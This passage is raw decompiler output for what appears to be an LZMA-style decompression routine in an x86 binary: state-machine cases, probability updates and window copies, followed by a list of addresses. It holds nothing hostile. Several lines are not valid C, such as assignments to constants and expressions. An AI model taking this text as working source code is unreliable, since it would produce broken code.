													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406795
0x00406795
0x00406799
0x004067a6
0x004067b0
0x00000000
0x0040679b
0x0040679b
0x004067d6
0x004067d9
0x004067dc
0x004067df
0x004067df
0x004067e2
0x004067e9
0x004067ee
0x004066cf
0x004066d2
0x00406a44
0x00406a44
0x00406a44
0x00406a47
0x00406a47
0x00406a47
0x00406a4d
0x00406a53
0x00406a59
0x00406a73
0x00406a76
0x00406a7c
0x00406a87
0x00406a89
0x00406a5b
0x00406a5b
0x00406a6a
0x00406a6e
0x00406a6e
0x00406a93
0x00000000
0x00000000
0x00406a95
0x00406a99
0x00406c48
0x00406c5e
0x00406c66
0x00406c6d
0x00406c6f
0x00406c76
0x00406c7a
0x00406c7a
0x00406aa5
0x00406aac
0x00406ab4
0x00406ab7
0x00406aba
0x00406aba
0x00406ac0
0x00406ac0
0x0040625c
0x0040625c
0x0040625c
0x00406265
0x00000000
0x00000000
0x0040626b
0x00000000
0x00406276
0x00000000
0x00000000
0x0040627f
0x00406282
0x00406285
0x00406289
0x00000000
0x00000000
0x0040628f
0x00406292
0x00406294
0x00406295
0x00406298
0x0040629a
0x0040629b
0x0040629d
0x004062a0
0x004062a5
0x004062aa
0x004062b3
0x004062c6
0x004062c9
0x004062d5
0x004062fd
0x004062ff
0x0040630d
0x0040630d
0x00406311
0x00000000
0x00000000
0x00000000
0x00000000
0x00406301
0x00406301
0x00406304
0x00406305
0x00406305
0x00000000
0x00406301
0x004062db
0x004062e0
0x004062e0
0x004062e9
0x004062f1
0x004062f4
0x00000000
0x004062fa
0x004062fa
0x00000000
0x004062fa
0x00000000
0x00406317
0x00406317
0x0040631b
0x00406bc7
0x00000000
0x00406bc7
0x00406324
0x00406334
0x00406337
0x0040633a
0x0040633a
0x0040633a
0x0040633d
0x00406341
0x00000000
0x00000000
0x00406343
0x00406349
0x00406373
0x00406379
0x00406380
0x00000000
0x00406380
0x0040634f
0x00406352
0x00406357
